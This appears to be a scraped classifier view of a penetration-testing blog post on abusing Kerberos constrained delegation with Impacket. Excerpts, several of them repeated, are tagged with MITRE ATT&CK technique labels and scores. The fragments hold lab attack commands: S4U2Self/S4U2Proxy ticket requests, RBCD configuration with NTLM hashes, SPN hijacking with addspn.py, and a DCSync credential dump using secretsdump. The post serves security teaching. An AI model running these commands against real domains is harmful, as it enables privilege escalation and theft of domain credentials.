“DCSync against dc01 as administrator impacket-secretsdump -k dc01.secure.local 3. Live machine SPN hijacking with GenericWrite SPN hijacking is an edge-case technique where, if the conditions line up, an attacker with permissions to modify a target's SPNs can effectively…”
T1558.003 Kerberoasting
77%
“local). 1. Find machine-based constrained delegation with protocol transition (pc01$ to host/dc01.secure.local) impacket-findDelegation 'secure.local/kcduser':'password2@' -dc-ip 10.0.1.200 2. Using pc01$'s NTLM hash, we can obtain a service ticket…”
T1550.003 Pass the Ticket
70%
“an elevated user. - Pass that forwardable ticket (with an additional S4U2Proxy) to the service the compromised resource is allowed to delegate to. 1. Add a user SPN and machine account, reflective RBCD Assume we've compromised the user kcduser with the password password2@, w…”
T1550.003 Pass the Ticket
69%
“compromised host is allowed to delegate to. A quick aside: the reason why MAQ comes in handy is because computer accounts always have SPNs tied to them by default. However, if MAQ is disabled, the same can be done if an attacker controls a user with an SPN or has the permission t…”
T1550.003 Pass the Ticket
64%
“' --spn 'host/pc01.secure.local' 10.0.1.200 11. Verify all SPNs are restored on dc01$ and pc01$ python3 addspn.py -u secure.local\dacluser -p 'password3#' -t 'pc01$' 10.0.1.200 -q python3 addspn.py -u secure.local\dacluser -p 'password3#' -t 'dc…”
T1558 Steal or Forge Kerberos Tickets
58%
“9f44-e1453be7af5a - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#a-forwardable-result - https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained - https://sqlmastersconsulting.com.au/sql-server-…”
T1558 Steal or Forge Kerberos Tickets
52%
“compromised host is allowed to delegate to. A quick aside: the reason why MAQ comes in handy is because computer accounts always have SPNs tied to them by default. However, if MAQ is disabled, the same can be done if an attacker controls a user with an SPN or has the permission t…”
T1558 Steal or Forge Kerberos Tickets
51%
“Abusing Delegation with Impacket (Part 2): Constrained Delegation Hunter recently graduated with his master's degree in cyber defense and has over two years of experience in penetration testing. His favorit…”
T1558.001 Golden Ticket
47%
“3. Configure pc01$ to trust machine$ for delegation impacket-rbcd -delegate-from 'machine$' -delegate-to 'pc01$' -dc-ip 10.0.1.200 -action 'write' -hashes 'aad3b435b51404eeaad3b435b51404ee:8d67f5a634a447bee65785be5c49b2a4' 'secure.local/pc01$'…”
T1550.003 Pass the Ticket
47%
“…404eeaad3b435b51404ee:16f2bd968f2885a410873b4efa104527' 'secure.local/administrator' Conclusion While constrained delegation offers improvements in limiting risk compared to its dangerous unconstrained counterpart, if a resource configured with constrained delegation is…”
T1558.001 Golden Ticket
46%
“host/pc01.secure.local SPN to dc01$ python3 addspn.py -u secure.local\dacluser -p 'password3#' -t 'dc01$' --spn 'host/pc01.secure.local' 10.0.1.200 5. Using pc02$'s NTLM hash, obtain a service ticket as the domain administrator to host/pc01.secure.…”
T1558.003 Kerberoasting
43%
“u secure.local\kcduser -p 'password2@' -s host/kcd.secure.local --target-type samname 10.0.1.200 -r 2. S4U2Self and S4U2Proxy with machine NTLM hash Assume we've compromised the machine pc01$ with the NTLM hash aad3b435b51404eeaad3b435b51404ee:8d67f5a634a447…”
T1558.003 Kerberoasting
41%
“…rarily write SPNs among other things. This means, with the permissions we have, we can migrate pc01's host/pc01.secure.local SPN to dc01, essentially making dc01 the target for delegation. Then, if we perform S4U2Self and S4U2Proxy, we can obtain a service ticket as an el…”
T1558 Steal or Forge Kerberos Tickets
40%
“3. Configure pc01$ to trust machine$ for delegation impacket-rbcd -delegate-from 'machine$' -delegate-to 'pc01$' -dc-ip 10.0.1.200 -action 'write' -hashes 'aad3b435b51404eeaad3b435b51404ee:8d67f5a634a447bee65785be5c49b2a4' 'secure.local/pc01$'…”
T1558.001 Golden Ticket
39%
“and S4U2Proxy. There are two types of constrained delegation – with and without protocol transition. The key difference is how the impersonation is done. - Constrained with protocol transition: uses S4U2Self to impersonate users and S4U2Proxy to generate a service ticket to the…”
T1550.003 Pass the Ticket
39%
“S4U2Self and S4U2Proxy with username and password Assume we've compromised the user kcduser with the password password2@, which is allowed to delegate to host/dc01.secure.local, being the domain controller. To escalate in the domain, since protocol transition is enabled, w…”
T1558.001 Golden Ticket
39%
“' --spn 'host/pc01.secure.local' 10.0.1.200 11. Verify all SPNs are restored on dc01$ and pc01$ python3 addspn.py -u secure.local\dacluser -p 'password3#' -t 'pc01$' 10.0.1.200 -q python3 addspn.py -u secure.local\dacluser -p 'password3#' -t 'dc…”
T1550.003 Pass the Ticket
38%
“to delegate to host/dc01.secure.local, being the domain controller. To escalate in the domain, since protocol transition is disabled, we can obtain a forwardable service ticket through reflective resource-based constrained delegation (MAQ + RBCD). 1. Find machine-based co…”
T1550.003 Pass the Ticket
37%
“3. Configure pc01$ to trust machine$ for delegation impacket-rbcd -delegate-from 'machine$' -delegate-to 'pc01$' -dc-ip 10.0.1.200 -action 'write' -hashes 'aad3b435b51404eeaad3b435b51404ee:8d67f5a634a447bee65785be5c49b2a4' 'secure.local/pc01$'…”
T1550.003 Pass the Ticket
35%
“the question: how can we use S4U2Proxy to generate a forwardable service ticket? Reflective resource-based constrained delegation Any user or machine in a domain, by default, can configure resource-based constrained delegation (RBCD) on themselves. This is essentially trad…”
T1558.001 Golden Ticket
35%
“an elevated user. - Pass that forwardable ticket (with an additional S4U2Proxy) to the service the compromised resource is allowed to delegate to. 1. Add a user SPN and machine account, reflective RBCD Assume we've compromised the user kcduser with the password password2@, w…”
T1558.001 Golden Ticket
35%
“the question: how can we use S4U2Proxy to generate a forwardable service ticket? Reflective resource-based constrained delegation Any user or machine in a domain, by default, can configure resource-based constrained delegation (RBCD) on themselves. This is essentially trad…”
T1558.001 Golden Ticket
35%
“S4U2Self and S4U2Proxy with username and password Assume we've compromised the user kcduser with the password password2@, which is allowed to delegate to host/dc01.secure.local, being the domain controller. To escalate in the domain, since protocol transition is enabled, w…”
T1558 Steal or Forge Kerberos Tickets
34%
“to delegate to host/dc01.secure.local, being the domain controller. To escalate in the domain, since protocol transition is disabled, we can obtain a forwardable service ticket through reflective resource-based constrained delegation (MAQ + RBCD). 1. Find machine-based co…”
T1558 Steal or Forge Kerberos Tickets
34%
“the question: how can we use S4U2Proxy to generate a forwardable service ticket? Reflective resource-based constrained delegation Any user or machine in a domain, by default, can configure resource-based constrained delegation (RBCD) on themselves. This is essentially trad…”
T1550.003 Pass the Ticket
33%
“…rarily write SPNs among other things. This means, with the permissions we have, we can migrate pc01's host/pc01.secure.local SPN to dc01, essentially making dc01 the target for delegation. Then, if we perform S4U2Self and S4U2Proxy, we can obtain a service ticket as an el…”
T1550.003 Pass the Ticket
32%
“and S4U2Proxy. There are two types of constrained delegation – with and without protocol transition. The key difference is how the impersonation is done. - Constrained with protocol transition: uses S4U2Self to impersonate users and S4U2Proxy to generate a service ticket to the…”
T1558.003 Kerberoasting
32%
“to delegate to host/dc01.secure.local, being the domain controller. To escalate in the domain, since protocol transition is disabled, we can obtain a forwardable service ticket through reflective resource-based constrained delegation (MAQ + RBCD). 1. Find machine-based co…”
T1558.003 Kerberoasting
31%
“to host/dc01.secure.local python3 tgssub.py -in administrator@[email protected] -out dc01-ticket.ccache -altservice 'host/dc01.secure.local' 7. Export the ticket into memory export KRB5CCNAME=dc01-ticket.ccache 8. Perform a DCSync against dc01 as adminis…”
Summary
This is the second in a three-part series of blog posts discussing how to abuse Kerberos delegation! If you haven't already, feel free to read the first blog post, as it discusses the Kerberos authentication process and how delegation plays an important role in solving the double-hop problem.